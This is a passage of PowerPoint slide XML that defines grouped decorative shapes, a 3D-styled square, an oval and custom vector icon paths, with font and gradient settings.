                  <a:cs typeface="Helvetica Neue"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7" name="Rectangle 8"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1765833" y="4036682"/>
                <a:ext cx="1274973" cy="50962"/>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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Helvetica Neue"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="8" name="Rectangle 9"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9808382" y="4036682"/>
                <a:ext cx="1274973" cy="50962"/>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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Helvetica Neue"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="9" name="Group 10"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8057" y="2772"/>
              <a:ext cx="2054" cy="3685"/>
              <a:chOff x="7980911" y="2484779"/>
              <a:chExt cx="1304470" cy="2340121"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="10" name="Group 11"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks noChangeAspect="1"/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="7980911" y="2484779"/>
                <a:ext cx="1304470" cy="1802479"/>
                <a:chOff x="3149600" y="2480384"/>
                <a:chExt cx="1201204" cy="1660005"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="17" name="等腰三角形 51"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm flipV="1">
                  <a:off x="3149600" y="3200883"/>
                  <a:ext cx="1201204" cy="939506"/>
                </a:xfrm>
                <a:prstGeom prst="triangle">
                  <a:avLst/>
                </a:prstGeom>
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="accent4"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="EEECE1">
                        <a:lumMod val="90000"/>
                        <a:alpha val="0"/>
                      </a:srgbClr>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
                <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:effectLst/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                    <a:solidFill>
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="18" name="矩形 52"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3630724" y="2480384"/>
                  <a:ext cx="720080" cy="720080"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:effectLst>
                  <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                    <a:srgbClr val="000000">
                      <a:alpha val="35000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:scene3d>
                  <a:camera prst="isometricOffAxis2Top">
                    <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                  </a:camera>
                  <a:lightRig rig="chilly" dir="t">
                    <a:rot lat="0" lon="0" rev="600000"/>
                  </a:lightRig>
                </a:scene3d>
                <a:sp3d extrusionH="666750"/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                    <a:solidFill>
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11" name="Oval 12"/>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8347955" y="4239008"/>
                <a:ext cx="585892" cy="585892"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ln w="3810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id-ID"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="12" name="Group 13"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="8468992" y="4362838"/>
                <a:ext cx="328308" cy="328308"/>
                <a:chOff x="8216107" y="2577307"/>
                <a:chExt cx="464344" cy="464344"/>
              </a:xfrm>
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="13" name="AutoShape 52"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8216107" y="2577307"/>
                  <a:ext cx="464344" cy="464344"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="+- 0 10800 87"/>
                    <a:gd name="T1" fmla="*/ T0 w 21426"/>
                    <a:gd name="T2" fmla="+- 0 10799 73"/>
                    <a:gd name="T3" fmla="*/ 10799 h 21453"/>
                    <a:gd name="T4" fmla="+- 0 10800 87"/>
                    <a:gd name="T5" fmla="*/ T4 w 21426"/>
                    <a:gd name="T6" fmla="+- 0 10799 73"/>
                    <a:gd name="T7" fmla="*/ 10799 h 21453"/>
                    <a:gd name="T8" fmla="+- 0 10800 87"/>
                    <a:gd name="T9" fmla="*/ T8 w 21426"/>
                    <a:gd name="T10" fmla="+- 0 10799 73"/>
                    <a:gd name="T11" fmla="*/ 10799 h 21453"/>
                    <a:gd name="T12" fmla="+- 0 10800 87"/>
                    <a:gd name="T13" fmla="*/ T12 w 21426"/>
                    <a:gd name="T14" fmla="+- 0 10799 73"/>
                    <a:gd name="T15" fmla="*/ 10799 h 21453"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T1" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T5" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T9" y="T11"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T13" y="T15"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21426" h="21453">
                      <a:moveTo>
                        <a:pt x="8034" y="20112"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="5816" y="17892"/>
                        <a:pt x="3556" y="15628"/>
                        <a:pt x="1338" y="13408"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3241" y="7240"/>
                        <a:pt x="11488" y="7509"/>
                        <a:pt x="13391" y="1341"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15609" y="3560"/>
                        <a:pt x="17869" y="5825"/>
                        <a:pt x="20087" y="8045"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18184" y="14212"/>
                        <a:pt x="9937" y="13944"/>
                        <a:pt x="8034" y="20112"/>
                      </a:cubicBezTo>
                      <a:moveTo>
                        <a:pt x="21034" y="7097"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="14338" y="393"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="14006" y="60"/>
                        <a:pt x="13525" y="-73"/>
                        <a:pt x="13069" y="39"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12828" y="98"/>
                        <a:pt x="12614" y="222"/>
                        <a:pt x="12444" y="393"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12292" y="545"/>
                        <a:pt x="12177" y="733"/>
                        <a:pt x="12112" y="944"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11808" y="1929"/>
                        <a:pt x="11283" y="2785"/>
                        <a:pt x="10507" y="3562"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9471" y="4598"/>
                        <a:pt x="8121" y="5384"/>
                        <a:pt x="6693" y="6214"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5177" y="7094"/>
                        <a:pt x="3611" y="8006"/>
                        <a:pt x="2328" y="9290"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1237" y="10383"/>
                        <a:pt x="493" y="11600"/>
                        <a:pt x="59" y="13011"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="-87" y="13488"/>
                        <a:pt x="40" y="14004"/>
                        <a:pt x="391" y="14356"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="7087" y="21060"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="7419" y="21393"/>
                        <a:pt x="7900" y="21526"/>
                        <a:pt x="8356" y="21414"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8597" y="21354"/>
                        <a:pt x="8811" y="21231"/>
                        <a:pt x="8981" y="21060"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9133" y="20908"/>
                        <a:pt x="9248" y="20720"/>
                        <a:pt x="9314" y="20508"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9617" y="19523"/>
                        <a:pt x="10142" y="18667"/>
                        <a:pt x="10918" y="17890"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11954" y="16853"/>
                        <a:pt x="13304" y="16069"/>
                        <a:pt x="14733" y="15239"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16248" y="14357"/>
                        <a:pt x="17814" y="13446"/>
                        <a:pt x="19097" y="12162"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20188" y="11070"/>
                        <a:pt x="20932" y="9852"/>
                        <a:pt x="21366" y="8440"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21512" y="7965"/>
                        <a:pt x="21385" y="7448"/>
                        <a:pt x="21034" y="7097"/>
                      </a:cubicBezTo>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14" name="AutoShape 53"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8390732" y="2736850"/>
                  <a:ext cx="125413" cy="130175"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="+- 0 10801 59"/>
                    <a:gd name="T1" fmla="*/ T0 w 21484"/>
                    <a:gd name="T2" fmla="+- 0 10799 41"/>
                    <a:gd name="T3" fmla="*/ 10799 h 21516"/>
                    <a:gd name="T4" fmla="+- 0 10801 59"/>
                    <a:gd name="T5" fmla="*/ T4 w 21484"/>
                    <a:gd name="T6" fmla="+- 0 10799 41"/>
                    <a:gd name="T7" fmla="*/ 10799 h 21516"/>
                    <a:gd name="T8" fmla="+- 0 10801 59"/>
                    <a:gd name="T9" fmla="*/ T8 w 21484"/>
                    <a:gd name="T10" fmla="+- 0 10799 41"/>
                    <a:gd name="T11" fmla="*/ 10799 h 21516"/>
                    <a:gd name="T12" fmla="+- 0 10801 59"/>
                    <a:gd name="T13" fmla="*/ T12 w 21484"/>
                    <a:gd name="T14" fmla="+- 0 10799 41"/>
                    <a:gd name="T15" fmla="*/ 10799 h 21516"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T1" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T5" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T9" y="T11"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T13" y="T15"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21484" h="21516">
                      <a:moveTo>
                        <a:pt x="17511" y="14987"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="17287" y="15384"/>
                        <a:pt x="17032" y="15740"/>
                        <a:pt x="16731" y="16049"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15340" y="14692"/>
                        <a:pt x="13947" y="13205"/>
                        <a:pt x="12559" y="11675"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12912" y="11521"/>
                        <a:pt x="13287" y="11362"/>
                        <a:pt x="13689" y="11198"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14092" y="11034"/>
                        <a:pt x="14494" y="10927"/>
                        <a:pt x="14895" y="10861"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15308" y="10801"/>
                        <a:pt x="15715" y="10819"/>
                        <a:pt x="16122" y="10913"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16527" y="11011"/>
                        <a:pt x="16909" y="11222"/>
                        <a:pt x="17262" y="11554"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17612" y="11890"/>
                        <a:pt x="17835" y="12244"/>
                        <a:pt x="17923" y="12620"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18020" y="13004"/>
                        <a:pt x="18025" y="13392"/>
                        <a:pt x="17958" y="13789"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17883" y="14187"/>
                        <a:pt x="17738" y="14585"/>
                        <a:pt x="17511" y="14987"/>
                      </a:cubicBezTo>
                      <a:moveTo>
                        <a:pt x="5799" y="10193"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="5096" y="10221"/>
                        <a:pt x="4482" y="9996"/>
                        <a:pt x="3946" y="9496"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3717" y="9285"/>
                        <a:pt x="3558" y="9028"/>
                        <a:pt x="3461" y="8724"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3359" y="8420"/>
                        <a:pt x="3326" y="8088"/>
                        <a:pt x="3366" y="7723"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3397" y="7363"/>
                        <a:pt x="3509" y="6989"/>
                        <a:pt x="3703" y="6610"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3889" y="6231"/>
                        <a:pt x="4160" y="5852"/>
                        <a:pt x="4510" y="5487"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5768" y="6694"/>
                        <a:pt x="7022" y="8018"/>
                        <a:pt x="8282" y="9388"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7330" y="9893"/>
                        <a:pt x="6501" y="10164"/>
                        <a:pt x="5799" y="10193"/>
                      </a:cubicBezTo>
                      <a:moveTo>
                        <a:pt x="19678" y="8570"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="18868" y="7915"/>
                        <a:pt x="18055" y="7470"/>
                        <a:pt x="17235" y="7250"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16421" y="7031"/>
                        <a:pt x="15603" y="6942"/>
                        <a:pt x="14779" y="6998"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13964" y="7059"/>
                        <a:pt x="13130" y="7236"/>
                        <a:pt x="12296" y="7545"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11462" y="7859"/>
                        <a:pt x="10625" y="8200"/>
                        <a:pt x="9782" y="8593"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8448" y="7115"/>
                        <a:pt x="7114" y="5658"/>
                        <a:pt x="5778" y="4299"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6382" y="3775"/>
                        <a:pt x="6963" y="3509"/>
                        <a:pt x="7526" y="3490"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8088" y="3467"/>
                        <a:pt x="8631" y="3523"/>
                        <a:pt x="9145" y="3649"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9669" y="3775"/>
                        <a:pt x="10149" y="3883"/>
                        <a:pt x="10590" y="3967"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11038" y="4051"/>
                        <a:pt x="11424" y="3958"/>
                        <a:pt x="11765" y="3682"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12123" y="3382"/>
                        <a:pt x="12321" y="2994"/>
                        <a:pt x="12351" y="2526"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12376" y="2054"/>
                        <a:pt x="12189" y="1596"/>
                        <a:pt x="11782" y="1147"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11258" y="569"/>
                        <a:pt x="10630" y="216"/>
                        <a:pt x="9872" y="85"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9126" y="-41"/>
                        <a:pt x="8358" y="-30"/>
                        <a:pt x="7564" y="136"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6780" y="309"/>
                        <a:pt x="6032" y="595"/>
                        <a:pt x="5324" y="997"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4617" y="1399"/>
                        <a:pt x="4048" y="1811"/>
                        <a:pt x="3626" y="2213"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3464" y="2066"/>
                        <a:pt x="3302" y="1918"/>
                        <a:pt x="3141" y="1773"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2963" y="1614"/>
                        <a:pt x="2739" y="1530"/>
                        <a:pt x="2471" y="1535"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2200" y="1535"/>
                        <a:pt x="1977" y="1647"/>
                        <a:pt x="1793" y="1853"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1615" y="2054"/>
                        <a:pt x="1530" y="2288"/>
                        <a:pt x="1565" y="2536"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1589" y="2793"/>
                        <a:pt x="1696" y="2989"/>
                        <a:pt x="1880" y="3139"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2044" y="3270"/>
                        <a:pt x="2203" y="3401"/>
                        <a:pt x="2364" y="3537"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1731" y="4276"/>
                        <a:pt x="1207" y="5094"/>
                        <a:pt x="795" y="5957"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="378" y="6820"/>
                        <a:pt x="130" y="7676"/>
                        <a:pt x="37" y="8509"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="-59" y="9346"/>
                        <a:pt x="33" y="10113"/>
                        <a:pt x="298" y="10824"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="566" y="11540"/>
                        <a:pt x="1056" y="12148"/>
                        <a:pt x="1774" y="12723"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2942" y="13658"/>
                        <a:pt x="4321" y="14056"/>
                        <a:pt x="5915" y="13967"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7507" y="13874"/>
                        <a:pt x="9223" y="13415"/>
                        <a:pt x="11064" y="12461"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12532" y="14093"/>
                        <a:pt x="14002" y="15716"/>
                        <a:pt x="15470" y="17223"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14849" y="17728"/>
                        <a:pt x="14305" y="18018"/>
                        <a:pt x="13826" y="18111"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13344" y="18210"/>
                        <a:pt x="12917" y="18200"/>
                        <a:pt x="12530" y="18088"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12142" y="17971"/>
                        <a:pt x="11782" y="17803"/>
                        <a:pt x="11455" y="17587"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11125" y="17368"/>
                        <a:pt x="10799" y="17181"/>
                        <a:pt x="10474" y="17026"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10154" y="16872"/>
                        <a:pt x="9823" y="16788"/>
                        <a:pt x="9486" y="16783"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9145" y="16778"/>
                        <a:pt x="8785" y="16937"/>
                        <a:pt x="8388" y="17265"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7981" y="17606"/>
                        <a:pt x="7777" y="18004"/>
                        <a:pt x="7777" y="18453"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7777" y="18897"/>
                        <a:pt x="7991" y="19351"/>
                        <a:pt x="8408" y="19809"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8830" y="20268"/>
                        <a:pt x="9379" y="20651"/>
                        <a:pt x="10042" y="20955"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10708" y="21259"/>
                        <a:pt x="11455" y="21451"/>
                        <a:pt x="12279" y="21502"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13103" y="21559"/>
                        <a:pt x="13970" y="21437"/>
                        <a:pt x="14886" y="21109"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15807" y="20787"/>
                        <a:pt x="16721" y="20202"/>
                        <a:pt x="17617" y="19332"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18051" y="19739"/>
                        <a:pt x="18489" y="20127"/>
                        <a:pt x="18921" y="20501"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19107" y="20656"/>
                        <a:pt x="19328" y="20731"/>
                        <a:pt x="19601" y="20712"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19861" y="20703"/>
                        <a:pt x="20090" y="20586"/>
                        <a:pt x="20269" y="20375"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20455" y="20160"/>
                        <a:pt x="20532" y="19921"/>
                        <a:pt x="20503" y="19674"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20477" y="19421"/>
                        <a:pt x="20371" y="19229"/>
                        <a:pt x="20192" y="19089"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19755" y="18752"/>
                        <a:pt x="19321" y="18397"/>
                        <a:pt x="18884" y="18022"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19626" y="17143"/>
                        <a:pt x="20221" y="16217"/>
                        <a:pt x="20664" y="15300"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21103" y="14379"/>
                        <a:pt x="21367" y="13490"/>
                        <a:pt x="21453" y="12667"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21540" y="11839"/>
                        <a:pt x="21439" y="11091"/>
                        <a:pt x="21159" y="10412"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20880" y="9725"/>
                        <a:pt x="20386" y="9135"/>
                        <a:pt x="19678" y="8570"/>
                      </a:cubicBezTo>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15" name="AutoShape 54"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8375650" y="2896394"/>
                  <a:ext cx="70644" cy="73819"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="+- 0 10791 197"/>
                    <a:gd name="T1" fmla="*/ T0 w 21188"/>
                    <a:gd name="T2" fmla="+- 0 10794 193"/>
                    <a:gd name="T3" fmla="*/ 10794 h 21203"/>
                    <a:gd name="T4" fmla="+- 0 10791 197"/>
                    <a:gd name="T5" fmla="*/ T4 w 21188"/>
                    <a:gd name="T6" fmla="+- 0 10794 193"/>
                    <a:gd name="T7" fmla="*/ 10794 h 21203"/>
                    <a:gd name="T8" fmla="+- 0 10791 197"/>
                    <a:gd name="T9" fmla="*/ T8 w 21188"/>
                    <a:gd name="T10" fmla="+- 0 10794 193"/>
                    <a:gd name="T11" fmla="*/ 10794 h 21203"/>
                    <a:gd name="T12" fmla="+- 0 10791 197"/>
                    <a:gd name="T13" fmla="*/ T12 w 21188"/>
                    <a:gd name="T14" fmla="+- 0 10794 193"/>
                    <a:gd name="T15" fmla="*/ 10794 h 21203"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T1" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T5" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T9" y="T11"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T13" y="T15"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21188" h="21203">
                      <a:moveTo>
                        <a:pt x="17615" y="468"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="17606" y="468"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="14870" y="2476"/>
                        <a:pt x="12200" y="4590"/>
                        <a:pt x="9727" y="6958"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7348" y="9227"/>
                        <a:pt x="5200" y="11619"/>
                        <a:pt x="3329" y="14060"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="341" y="17962"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="350" y="17970"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="-197" y="18786"/>
                        <a:pt x="-106" y="19880"/>
                        <a:pt x="638" y="20590"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1491" y="21407"/>
